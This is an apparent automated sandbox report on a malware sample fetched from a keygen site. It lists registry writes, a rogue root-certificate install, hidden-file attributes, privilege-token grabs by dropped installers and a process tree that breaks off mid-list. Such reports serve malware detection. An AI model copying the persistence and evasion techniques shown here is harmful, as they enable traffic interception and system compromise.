Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{5B2DA445-0AA5-4514-913B-461560BC13DE}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	schtasks.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	schtasks.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
7420	PING.EXE
1436	PING.EXE
3904	PING.EXE
6448	PING.EXE

Script User-Agent 7 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	240	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	667	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	670	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	684	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	687	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	234	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4144	chrome.exe
4144	chrome.exe
4688	chrome.exe
4688	chrome.exe
3920	chrome.exe
3920	chrome.exe
4536	chrome.exe
4536	chrome.exe
3036	chrome.exe
3036	chrome.exe
4740	chrome.exe
4740	chrome.exe
796	chrome.exe
796	chrome.exe
4592	chrome.exe
4592	chrome.exe
1436	chrome.exe
1436	chrome.exe
364	chrome.exe
364	chrome.exe
844	setups.tmp
844	setups.tmp
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2352	msinfo32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2064	MicrosoftEdgeCP.exe
2064	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	4036	Setup.exe
Token: SeCreateTokenPrivilege	364	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	364	askinstall20.exe
Token: SeLockMemoryPrivilege	364	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	364	askinstall20.exe
Token: SeMachineAccountPrivilege	364	askinstall20.exe
Token: SeTcbPrivilege	364	askinstall20.exe
Token: SeSecurityPrivilege	364	askinstall20.exe
Token: SeTakeOwnershipPrivilege	364	askinstall20.exe
Token: SeLoadDriverPrivilege	364	askinstall20.exe
Token: SeSystemProfilePrivilege	364	askinstall20.exe
Token: SeSystemtimePrivilege	364	askinstall20.exe
Token: SeProfSingleProcessPrivilege	364	askinstall20.exe
Token: SeIncBasePriorityPrivilege	364	askinstall20.exe
Token: SeCreatePagefilePrivilege	364	askinstall20.exe
Token: SeCreatePermanentPrivilege	364	askinstall20.exe
Token: SeBackupPrivilege	364	askinstall20.exe
Token: SeRestorePrivilege	364	askinstall20.exe
Token: SeShutdownPrivilege	364	askinstall20.exe
Token: SeDebugPrivilege	364	askinstall20.exe
Token: SeAuditPrivilege	364	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	364	askinstall20.exe
Token: SeChangeNotifyPrivilege	364	askinstall20.exe
Token: SeRemoteShutdownPrivilege	364	askinstall20.exe
Token: SeUndockPrivilege	364	askinstall20.exe
Token: SeSyncAgentPrivilege	364	askinstall20.exe
Token: SeEnableDelegationPrivilege	364	askinstall20.exe
Token: SeManageVolumePrivilege	364	askinstall20.exe
Token: SeImpersonatePrivilege	364	askinstall20.exe
Token: SeCreateGlobalPrivilege	364	askinstall20.exe
Token: 31	364	askinstall20.exe
Token: 32	364	askinstall20.exe
Token: 33	364	askinstall20.exe
Token: 34	364	askinstall20.exe
Token: 35	364	askinstall20.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	2516	multitimer.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2832	multitimer.exe
Token: SeDebugPrivilege	5580	vpn.tmp
Token: SeDebugPrivilege	5580	vpn.tmp
Token: SeDebugPrivilege	5648	powershell.exe
Token: SeDebugPrivilege	5724	powershell.exe
Token: SeDebugPrivilege	5196	RunWW.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
1772	chrome.exe
5152	Setup3310.tmp
1772	chrome.exe
5580	vpn.tmp
5736	layawhdydqp.exe
5848	IBInstaller_97039.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5184	e2c4myx2qb2.tmp
5272	vict.tmp

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4164	MicrosoftEdge.exe
2064	MicrosoftEdgeCP.exe
2064	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4688 wrote to memory of 4808	4688	chrome.exe	71
PID 4688 wrote to memory of 4808	4688	chrome.exe	71
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 3472	4688	chrome.exe	75
PID 4688 wrote to memory of 4144	4688	chrome.exe	76
PID 4688 wrote to memory of 4144	4688	chrome.exe	76
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78
PID 4688 wrote to memory of 3184	4688	chrome.exe	78

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
9392	attrib.exe
8284	attrib.exe
4340	attrib.exe
5656	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd057d6e00,0x7ffd057d6e10,0x7ffd057d6e20
  2⤵
  PID:4808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1572 /prefetch:2
  2⤵
  PID:3472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1612 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
  2⤵
  PID:732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:844
- C:\Program Files\Google\Chrome\Application\chrome.exe
